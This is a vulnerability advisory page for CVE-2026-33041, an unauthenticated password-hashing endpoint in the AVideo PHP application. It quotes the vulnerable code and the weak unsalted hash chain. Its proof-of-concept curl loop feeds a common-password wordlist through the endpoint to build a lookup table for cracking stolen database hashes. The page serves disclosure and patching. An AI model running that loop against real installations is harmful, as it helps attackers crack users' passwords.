Skip to main content

PHP CVE-2026-33041

MEDIUM
Information Exposure (CWE-200)
2026-03-17 https://github.com/WWBN/AVideo GHSA-px7x-gq96-rmp5
5.3
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
5.3 MEDIUM
AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Primary rating from GitHub Advisory · only source for this CVE.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
Low
Integrity
None
Availability
None

Lifecycle Timeline

3
Analysis Generated
Mar 17, 2026 - 20:30 vuln.today
Patch released
Mar 17, 2026 - 20:30 nvd
Patch available
CVE Published
Mar 17, 2026 - 19:48 nvd
MEDIUM 5.3

DescriptionGitHub Advisory

Summary

/objects/encryptPass.json.php exposes the application's password hashing algorithm to any unauthenticated user. An attacker can submit arbitrary passwords and receive their hashed equivalents, enabling offline password cracking against leaked database hashes.

Details

File: objects/encryptPass.json.php

php
$obj->password = @$_REQUEST['pass'];
$obj->encryptedPassword = encryptPassword($obj->password);
echo json_encode($obj);

No authentication is required. The encryptPassword() function in objects/functions.php (line ~2101) uses:

php
function encryptPassword($password, $noSalt = false) {
    if (!empty($advancedCustomUser->encryptPasswordsWithSalt) && !empty($global['salt']) && empty($noSalt)) {
        $password .= $global['salt'];
    }
    return md5(hash('whirlpool', sha1($password)));
}

By default, salt is NOT enabled (encryptPasswordsWithSalt is off), making the hash deterministic and identical to what's stored in the database.

PoC

bash
# Get the hash for any password
curl 'https://TARGET/objects/encryptPass.json.php?pass=admin123'
# Response: {"password":"admin123","encryptedPassword":"<hash>"}
# Build a rainbow table for common passwords
for pass in $(cat rockyou-top1000.txt); do
  curl -s "https://TARGET/objects/encryptPass.json.php?pass=$pass"
done

If an attacker obtains password hashes from the database (via SQL injection, backup exposure, etc.), they can instantly crack them by comparing against pre-computed hashes from this endpoint.

Impact

Password Cracking Acceleration - This endpoint eliminates the need for an attacker to reverse-engineer the hashing algorithm. Combined with the weak hash chain (md5+whirlpool+sha1, no salt by default), an attacker with access to database hashes can crack passwords extremely quickly.

Additionally, this reveals whether salt is enabled and the exact hashing implementation, which is sensitive cryptographic configuration.

AnalysisAI

An unauthenticated attacker can leverage an exposed password hashing endpoint in PHP applications to obtain hashed versions of arbitrary passwords, facilitating offline cracking attacks against compromised database credentials. The vulnerable /objects/encryptPass.json.php file accepts user-supplied passwords via request parameters and returns their encrypted equivalents without authentication, effectively disclosing the application's hashing algorithm and salt to potential adversaries. This information disclosure has a CVSS score of 5.3 and patches are available.

Technical ContextAI

Information disclosure occurs when an application inadvertently reveals sensitive data to unauthorized actors through error messages, logs, or improper access controls. This vulnerability is classified as Information Exposure (CWE-200).

RemediationAI

A vendor patch is available — apply it immediately. Implement proper access controls. Sanitize error messages in production. Review logging practices to avoid capturing sensitive data.

More in PHP

View all
CVE-2012-1823 CRITICAL POC
9.8 May 11

sapi/cgi/cgi_main.c in PHP before 5.3.12 and 5.4.x before 5.4.2, when configured as a CGI script (aka php-cgi), does not

CVE-2016-1555 CRITICAL POC
9.8 Apr 21

(1) boardData102.php, (2) boardData103.php, (3) boardDataJP.php, (4) boardDataNA.php, and (5) boardDataWW.php in Netgear

CVE-2024-11680 CRITICAL POC
9.8 Nov 26

ProjectSend versions prior to r1720 are affected by an improper authentication vulnerability. Rated critical severity (C

CVE-2025-49113 CRITICAL POC
9.9 Jun 02

Roundcube Webmail contains a critical PHP object deserialization vulnerability (CVE-2025-49113, CVSS 9.9) that allows au

CVE-2017-9841 CRITICAL POC
9.8 Jun 27

Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows remote attackers to execute arbitrary PHP c

CVE-2025-0108 HIGH POC
8.8 Feb 12

Palo Alto Networks PAN-OS management web interface contains an authentication bypass allowing unauthenticated attackers

CVE-2021-25298 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2021-25296 HIGH POC
8.8 Feb 15

Nagios XI version xi-5.7.5 is affected by OS command injection. Rated high severity (CVSS 8.8), this vulnerability is re

CVE-2013-4983 CRITICAL POC
10.0 Sep 10

The get_referers function in /opt/ws/bin/sblistpack in Sophos Web Appliance before 3.7.9.1 and 3.8 before 3.8.1.1 allows

CVE-2023-6553 CRITICAL POC
9.8 Dec 15

The Backup Migration plugin for WordPress is vulnerable to Remote Code Execution in all versions up to, and including, 1

CVE-2024-46506 CRITICAL POC
10.0 May 13

NetAlertX (formerly PiAlert) versions 23.01.14 through 24.x before 24.10.12 allow unauthenticated command injection thro

CVE-2024-8353 CRITICAL POC
9.8 Sep 28

The GiveWP - Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all

Share

CVE-2026-33041 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy